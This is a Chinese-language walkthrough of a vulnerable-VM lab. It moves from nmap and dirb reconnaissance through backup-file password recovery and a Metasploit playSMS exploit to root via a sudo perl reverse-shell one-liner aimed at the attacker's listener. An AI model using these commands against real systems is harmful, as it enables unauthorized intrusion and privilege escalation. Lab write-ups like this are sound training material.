一、靶场配置
网卡设置为nat
二、主机探测与端口扫描
nmap 192.168.121.0/24
发现开启了80端口
三、web信息收集
1.目录扫描
dirb http://192.168.121.184
拼接robots.txt看看
拼接secure目录
发现有个备份文件,话不多说,下载看看
解压需要密码,找其他功能点
发现在拼接/nothing的时候,不是一个404页面,查看源代码发现密码信息
尝试用这些密码解压backup.zip文件,发现freedom可以
解压成功后,是一个视频文件,显示已损坏,我们用记事本打开
发现了一个url和一个用户,还有一个隐藏的密码
拼接url,获得一个登录页面
尝试用记事本的用户登录,密码使用之前源码的密码尝试
这里登陆了许久登不上,迫不得已换了个浏览器
最终登陆成功,账号密码如下
touhid
diana
发现诸多功能点,都未能成功利用,最后想到playSMS框架有Nday
四、getshell
1.利用工具msfconsole
搜索对应框架漏洞
search playSMS
尝试过后,序号2可以成功利用
use 2
show options
标明yes的均需配置
set targeturi /SecreTSMSgatwayLogin #配置上传文件页面的url
set password diana #配置密码
set username touhid #配置账户
set rhosts 192.168.121.184 #靶机ip
set lhost 192.168.121.171 #kali监听机的ip
set LPORT 1234 #kali监听的端口
run
开始攻击
成功获取shell
五、提权
首先获取交互式shell
shell python -c 'import pty; pty.spawn("/bin/bash")'
输入查看具有sudo权限的程序
sudo -l
发现可以执行perl命令,所有用户均可以执行
通过perl写入反向shell语句
sudo perl -e 'use Socket;$i="192.168.121.171";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
kali监听9999端口,反弹成功
提权成功!